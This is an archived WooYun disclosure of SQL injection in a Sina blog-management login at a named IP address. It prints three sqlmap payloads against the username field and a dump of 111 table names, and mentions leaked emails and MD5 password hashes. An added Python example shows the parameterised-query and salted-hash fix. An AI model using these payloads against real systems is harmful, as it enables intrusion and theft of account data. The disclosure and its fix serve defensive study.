WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2014-04-17: Details reported to the vendor, awaiting vendor handling
2014-04-17: Vendor has confirmed; details disclosed to the vendor only
2014-04-27: Details disclosed to core white hats and relevant domain experts
2014-05-07: Details disclosed to regular white hats
2014-05-17: Details disclosed to intern white hats
2014-06-01: Details disclosed to the public
SQL injection in an important Sina system, internal information disclosure
https://219.142.118.208/ (Sina's backend blog management system) has a SQL injection vulnerability.
The login request is:
https://219.142.118.208//ac=validate?checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0&timestamp=1397711970&username=admin
Of these, the username parameter is injectable. Databases:
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0&timestamp=1397711970&username=admin' RLIKE IF(2027=2027,0x61646d696e,0x28) AND 'ddFw'='ddFw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0&timestamp=1397711970&username=admin' AND (SELECT 4711 FROM(SELECT COUNT(*),CONCAT(0x3a786f713a,(SELECT (CASE WHEN (4711=4711) THEN 1 ELSE 0 END)),0x3a696d6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rsOz'='rsOz

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0&timestamp=1397711970&username=admin' AND 2112=BENCHMARK(5000000,MD5(0x676d7745)) AND 'FBvx'='FBvx
---
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0
available databases [3]:
[*] elink
[*] information_schema
[*] test
Tables in elink:
Database: elink
[111 tables]
apilog
bak_201105
bak_201106
bak_201107
edm_result
edm_task
mdb_redis
upgrade
xad_du
xadmin_ad_manage
xadmin_admin
xadmin_admin_log_201105
xadmin_admin_log_201106
xadmin_admin_log_201107
xadmin_admin_log_201108
xadmin_admin_log_201109
xadmin_admin_log_201110
xadmin_admin_log_201111
xadmin_admin_log_201112
xadmin_admin_log_201201
xadmin_admin_log_201202
xadmin_admin_log_201203
xadmin_admin_log_201204
xadmin_admin_log_201205
xadmin_admin_log_201206
xadmin_admin_log_201207
xadmin_admin_log_201208
xadmin_admin_log_201209
xadmin_admin_log_201210
xadmin_admin_log_201211
xadmin_admin_log_201212
xadmin_admin_log_201301
xadmin_admin_log_201302
xadmin_admin_log_201303
xadmin_admin_log_201304
xadmin_admin_log_201305
xadmin_admin_log_201306
xadmin_admin_log_201307
xadmin_admin_log_201308
xadmin_admin_log_201309
xadmin_admin_log_201310
xadmin_admin_log_201311
xadmin_admin_log_201312
xadmin_admin_log_201401
xadmin_admin_log_201402
xadmin_admin_log_201403
xadmin_admin_log_201404
xadmin_admin_log_201405
xadmin_admin_log_201406
xadmin_blog_like_count
xadmin_contribute_201111
xadmin_contribute_201112
xadmin_contribute_201201
xadmin_contribute_201202
xadmin_contribute_201203
xadmin_contribute_201204
xadmin_contribute_201205
xadmin_contribute_201206
xadmin_contribute_201207
xadmin_contribute_201208
xadmin_contribute_201209
xadmin_contribute_201210
xadmin_contribute_201211
xadmin_contribute_201212
xadmin_contribute_201301
xadmin_contribute_201302
xadmin_contribute_201303
xadmin_contribute_201304
xadmin_contribute_201305
xadmin_contribute_201306
xadmin_contribute_201307
xadmin_contribute_201308
xadmin_contribute_201309
xadmin_contribute_201310
xadmin_contribute_201311
xadmin_contribute_201312
xadmin_contribute_201401
xadmin_contribute_201402
xadmin_contribute_201403
xadmin_contribute_201404
xadmin_discover_bank
xadmin_discover_manage
xadmin_discover_percentage
xadmin_editor_apply
xadmin_editor_assess
xadmin_editor_formerly_data
xadmin_editor_integral_2012
xadmin_editor_integral_2013
xadmin_editor_integral_2014
xadmin_editor_integral_2015
xadmin_editor_integral_2016
xadmin_edm_distribution
xadmin_edm_log
xadmin_edm_process
xadmin_guide_recommend
xadmin_handpick
xadmin_handpick_front
xadmin_hot_tag
xadmin_login_recommend
xadmin_radar_data_tal_20110608
xadmin_radar_data_tal_20110609
xadmin_tag_custom
xadmin_tag_editor
xadmin_tag_like_count
xadmin_tag_subscibe
xadmin_tag_writer
xadmin_tj_user_manage
xadmin_writer_blacklist
xadmin_zhi_jp
xadminhis_201105
xstat_del
Internal sensitive information disclosure:
Includes internal email addresses, accounts, job titles, MD5 password hashes and much more; only a small part was captured in screenshots.
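The two root causes this report exposes are a login query that splices the username into the SQL text (which is what turns the username field into the boolean, error and time oracles listed above) and passwords stored as unsalted MD5. The following example is added here and is not code from the report or from Sina's system: it uses sqlite3 in memory as a stand-in for the MySQL backend, assumes a credential table with the column names pw_salt and pw_hash (an assumption, not the real schema), and uses a constructed sample password. It places the string-built lookup next to a bound-parameter lookup to show that the boolean probe only behaves as an oracle in the former, and swaps MD5 for salted PBKDF2 with a constant-time comparison.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample credential; not a value from the report.
SAMPLE_PASSWORD = "correct horse battery staple"


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256 in place of the unsalted MD5 the report found stored.
    Returns (salt, digest) so the caller can persist both."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    return salt, digest


def make_db():
    """Constructed in-memory stand-in for the MySQL table behind the login form.
    The column names are an assumption, not the real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE xadmin_admin (username TEXT PRIMARY KEY, pw_salt BLOB, pw_hash BLOB)"
    )
    salt, digest = hash_password(SAMPLE_PASSWORD)
    conn.execute("INSERT INTO xadmin_admin VALUES (?, ?, ?)", ("admin", salt, digest))
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Builds the WHERE clause by string formatting. A quote inside `username` closes
    the literal and whatever follows is parsed as SQL, which is the report's finding."""
    sql = "SELECT username FROM xadmin_admin WHERE username='%s'" % username
    return conn.execute(sql).fetchone() is not None


def lookup_hardened(conn, username):
    """Bound parameter: the value travels separately from the SQL text, so the
    database only ever treats it as data, quotes included."""
    row = conn.execute(
        "SELECT username FROM xadmin_admin WHERE username=?", (username,)
    ).fetchone()
    return row is not None


def login_hardened(conn, username, password):
    """Parameterised lookup plus salted KDF verification with a constant-time compare."""
    row = conn.execute(
        "SELECT pw_salt, pw_hash FROM xadmin_admin WHERE username=?", (username,)
    ).fetchone()
    if row is None:
        # Run the KDF anyway so response time does not reveal whether the user exists.
        hash_password(password, b"\x00" * 16)
        return False
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


# Boolean probes of the shape sqlmap reported: a closing quote followed by a
# condition that is always true or always false.
TRUE_PROBE = "admin' AND '1'='1"
FALSE_PROBE = "admin' AND '1'='2"


def demo():
    """Returns the observable outcome of each probe against both lookups."""
    conn = make_db()
    return {
        "vuln_true": lookup_vulnerable(conn, TRUE_PROBE),    # condition was evaluated
        "vuln_false": lookup_vulnerable(conn, FALSE_PROBE),  # differs: an oracle
        "safe_true": lookup_hardened(conn, TRUE_PROBE),      # no such literal username
        "safe_false": lookup_hardened(conn, FALSE_PROBE),    # same answer: no oracle
        "login_ok": login_hardened(conn, "admin", SAMPLE_PASSWORD),
        "login_bad": login_hardened(conn, "admin", "not the password"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The point to take from the output is that the hardened lookup answers False for both probes, so nothing about the query's truth value leaks back to the client; the vulnerable lookup answers differently, and that difference is the whole basis of the blind techniques sqlmap listed. In a PHP/MySQL deployment like the one in the report the same fix is PDO or mysqli prepared statements, and `password_hash()` in place of `md5()`.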
Severity: High
Vulnerability Rank: 10
Confirmed: 2014-04-17 17:34
Thank you for your attention to Sina security; this has been handled.
None